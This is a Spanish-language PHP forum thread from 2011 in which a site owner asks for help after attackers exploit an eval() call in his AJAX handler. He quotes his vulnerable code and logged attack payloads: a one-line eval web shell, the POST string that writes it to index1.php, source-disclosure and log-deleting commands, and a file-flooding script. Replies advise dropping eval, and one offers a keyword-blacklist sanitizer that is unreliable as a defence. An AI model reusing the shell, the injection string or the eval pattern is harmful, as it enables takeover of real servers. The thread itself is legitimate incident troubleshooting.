Inyección XSS, Seguridad PHP, Eval, y otras funciones ayuda!!

CuriositO · #1 (**permalink**) 02/03/2011, 12:10

Tengo el siguiente problema me estan haciendo una inyecion y la unica forma q se me ocurre es a traves de:

Código PHP:

Ver original<?php
        $pr="arme_";
        $_us="{$pr}users";
        $_ol="{$pr}online";
        $_fi="{$pr}files";
        $_st="{$pr}estad";
        session_start();
        foreach( $_POST as $data => $valor ){
       $_POST [ $data ] = str_replace ( "'" , "\'" , $_POST [ $data ]);
       }
       foreach( $_POST as $data => $valor ){
       $_POST [ $data ] = str_replace ( "$" , "\'" , $_POST [ $data ]);
       }
        $data=$_POST['data'];
        $fn=array('ping','initialize','login','themess','exitapp','changeattr','changesas','adminact','delfile','sendfile','aprobfile','nopriv','endsession','changeprof','changemydata','writeon','newlnk');
        $ul=$_SESSION['ul'];
        $ret='';
        $prs=split("\|",$data);
        
        error_reporting(0);
        
 
 
        $connected = mysql_connect("xxx","root","xxx"); 
        $db = mysql_select_db("xxx");
 
        
        foreach($prs as $pr){parse_str($pr); // $i= id enviado
            if (in_array($a,$fn)){ // si es una funcion valida
            if ($i>$ul || $i==0){ // si no fue evaluada anteriormente u obligatoria
                eval($a.'($pr);'); //echo "alert('aaa=$i');";
                if ($i!=0) $ul=$i; // solo las no eval
            }} else {
                $ret.="unkw('$a');\r\n";
            }
        } $_SESSION['ul']=$ul;
        
////////////////////////////////////////////////////////////////////////////////
    if (!isset($_POST['svr'])) $_POST['svr']=0;
    /*if (isset($_SESSION['me'])) ping($_POST['svr']); else {
        $ret.="force_disconect();\r\n";
    
    }*/ 
    $ret="revived($ul);\r\n".$ret;
    //$ret.="alert('".strlen($ret)."');\r\n";
    echo "$ret";
    mysql_close($connected);

Y gracias a un script he podido detectar q me han inyectado lo siguiente:

IP: xxx
Method: POST
Value: echo file_get_contents(getenv(\'SCRIPT_FILENAME\'));
Script:
Time: Tuesday 01st 2011f March 2011 12:45:37 PM
==================================
IP: xxx
Method: POST
Value: <? extract($_POST); $eva=stripslashes($eva); eval($eva); ?>
Script:
Time: Tuesday 01st 2011f March 2011 12:45:37 PM
==================================
IP: xxx
Method: POST
Value: echo file_get_contents(getenv(SCRIPT_FILENAME));
Script:
Time: Tuesday 01st 2011f March 2011 12:46:50 PM
==================================
IP: xxx
Method: POST
Value: file_put_contents($z1,$z2);
Script:
Time: Tuesday 01st 2011f March 2011 12:50:43 PM
==================================
IP: xxx
Method: POST
Value: a=eval($et);//&fn[]=eval($et);//&et=aaaass&z1=index1.php&z2=<? extract($_POST); $eva=stripslashes($eva); eval($eva); ?>
Script:
Time: Tuesday 01st 2011f March 2011 01:10:31 PM

Por favor necesito ayuda. Alguna sugerencia de como evitar la inyeccion.
Agradecido de antemano. Al parecer utliza mis eval para inyectar el codigo, como puedo evaluar?, estuve probando varias funciones pero que ninguna resultó totalmente efectiva.

Ruke · #2 (**permalink**) 02/03/2011, 13:28

Esto te puede servir : http://www.tufuncion.com/php_seguridad_I

A mi me sirvió un montón ;).

Saludos :)

mogurbon · #3 (**permalink**) 02/03/2011, 14:11

te impacta desmasiado si quitaras el eval?

CuriositO · #4 (**permalink**) 02/03/2011, 15:08

si quitara el eval, voy a probar pero me imagino que no funcione el resto del codigo, donde llama a las funciones por array que la peticion la hace el js, que forma tendría de validar mi php o mi servidor para que no funcione de forma externa probé con

Código PHP:

Ver originalif(!strstr($_SERVER['HTTP_REFERER'],"miweb.com"))
header("location: index.html");

pero no funcionó, le pusieron a la inyeccion una variable con el nombe http_referer porque mi php precesó todo lo que ellos enviaron, y lo que tengo dudas es si utilizar mi eval para ejecutar su codigo, o alguna otra variable que les permitió crearme archivos dentro del hosting archivos con contenidos por ejemplo:

este es el codigo de index1.php

Código PHP:

Ver original<? extract($_POST); $eva=stripslashes($eva); eval($eva); ?>

tambien subieron este otro con el nombre de max1.php

Código PHP:

Ver original<?php $d = dir('prueba/');  while (false !== ($entry = $d->read())) {   $c++; } $d->close();  echo $c;  ?>

y este otro que no entendí mucho para que es

Código PHP:

Ver original<?php   for ($x=0; $x<=4999; $x++){$a='';   for ($t=0; $t<32;++$t){$a.=chr(rand(97,122));}      $fh=fopen("../$a","w");fwrite($fh,"crack by zorro");fclose($fh);}   $z=file_get_contents('http://miweb.com/mi.php'); ?>

o sea que tubieron acceso total, proque al ellos subir esta funcion eval tenía el control total de hosting podia borrar cambiar todo lo que quisiera atravez de codigo php... alguna sugerencia de que hacer o que validar, necesitan el codigo completo del php?

CuriositO · #5 (**permalink**) 02/03/2011, 15:22

estuve revisando el poco codigo del filtro que puse para saber que hacían o que mejor dicho que era lo que enviaban por post a mi php, porque el hosting no me sabía decir de que forma llegaban estos archivos a mi server y puse un script que se encargara de esto y pude econtrar lo que les dije antes y tambien pude ver esto otro ahora

Código PHP:

Ver originala=eval($et);//&fn[]=eval($et);//&et=echo unlink(\'webfilter.txt\');&z1=index1.php&z2=<? extract($_POST); $eva=stripslashes($eva); eval($eva); ?>
Script:

Código PHP:

Ver originalecho unlink(\'webfilter.txt\');

webfilter.txt es el archivo que me generaba los log de lo que hacía que al parecer lo borró para que yo no pudiera encontrarlo, por suerte había hecho una salva y pude verlo.

IP: ipdelatacante
Method: POST
Value: file_put_contents($z1,$z2);
Script:
Time: Tuesday 01st 2011f March 2011 12:50:43 PM
==================================
IP: ipdelatacante
Method: POST
Value: <? extract($_POST); $eva=stripslashes($eva); eval($eva); ?>
Script:
Time: Tuesday 01st 2011f March 2011 12:50:43 PM

abimaelrc · #6 (**permalink**) 02/03/2011, 15:35

No debes tener el eval, es un gran riesgo en seguridad usarlo. Trata de arreglar el código para que funcione sin esa función y para verificar lo que te envian a través del formulario, mira esta función para evitar si no es todo, la mayoría de inyecciones XSS http://www.forosdelweb.com/3497564-post2.html

CuriositO · #7 (**permalink**) 02/03/2011, 15:48

ya probé quitando el eval, sustituyendolo por un echo pero imposible no se me ejecuta nada no me funciona el codigo, que más podría utilizar en este caso?, porque en el codigo que les puse arriba al principio le siguen las funciones que son las que estan dentro de array.. que otra solución ven?

mogurbon · #8 (**permalink**) 02/03/2011, 17:28

no hay, mas segun tu mismo script se ve que fue leyendo vulnerabilidades hasta hacerse el de una copia de tu programa por lo cual ya vio esta linea

Código PHP:

   eval($a.'($pr);');

y su ultimo post segun tu script

Código PHP:

  a=eval($et);

osea ya mete lo que quiere en esa variable, ya programas enteros si quiere , la solucion es ir haciendo lo que lo que hace esa linea de otra forma , entonces que hace esa linea? o que esperas que haga?

s00rk · #9 (**permalink**) 02/03/2011, 22:04

Has algo tan sencillo como esto

con una simple funcion, yo asi lo hago y nunca he obtenido alguna injeccion

Código PHP:

Ver original<?
       function clean($value)
       {
            $check = $value;
            $value = preg_replace(sql_regcase("/(from|select|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/"),"",$value);
            $value = trim($value);
            $value = strip_tags($value);
            $value = addslashes($value);
            $value = str_replace("'", "''", $value);
 
            if( $check != $value )
            {
                $logf = fopen("logs/injection.txt", "a+");
                fprintf($logf, "Fecha: %s IP: %s Valor: %s, Corregido: %s\r\n", date("d-m-Y h:i:s A"), $_SERVER['REMOTE_ADDR'], $check, $value );
                fclose($logf);
                alertbox("Que intentas hacer? (: , Mejor mira esto xD", "http://www.google.com/");
            }
 
            return( $value );
}
 
if(!function_exists("alertbox")){
function alertbox($text, $url)
{
    echo "<body  bgcolor='#000000'><script>alert('$text');document.location = '$url'</script></body>";
    die("Javascript disabled");
} }
 
?>

Y ya solamente lo utilizamos en tu for, con uno solo bastaria y no tendrias que usarlo dos veces

Código PHP:

Ver original#
foreach( $_POST as $data => $valor ){
       $_POST [ $data ] = clean($_POST[$data]);
       }

Espero te sirva n_n

DeeR · #10 (**permalink**) 03/03/2011, 06:39

Te aconsejo los siguientes puntos

1.- Para evitar XSS, trate de codificar a entedidades html (utilizando htmlentities por ejemplo) todas las variables que vas a imprimir en tu vista o utilizar algún sistema de emplantillado como flexy
2.- Para evitar inyecciones SQL, te recomiendo desactivar magic quotes y siempre escarpar las comillas simples según el motor de db (en postgresql,mysql,etc. puedes utilizar un \ para escarpar una comilla ', en sql server, firebird,etc .. utiliza una comilla para escarpar una comilla
3.- Simplemente no uses eval, ya que existe un alto riesgo de que te inyecten cualquier código php, inclusive si son capaces de inyectar comillas inversas a un eval, ya son capaces de ejecutar comandos en el servdir (Execution Operators)

Saludos.

CuriositO · #11 (**permalink**) 15/06/2011, 12:59

graciaa a todos la solucion era desaparecer el eval(); y pues todo bien gracias a todos los que me ayudaron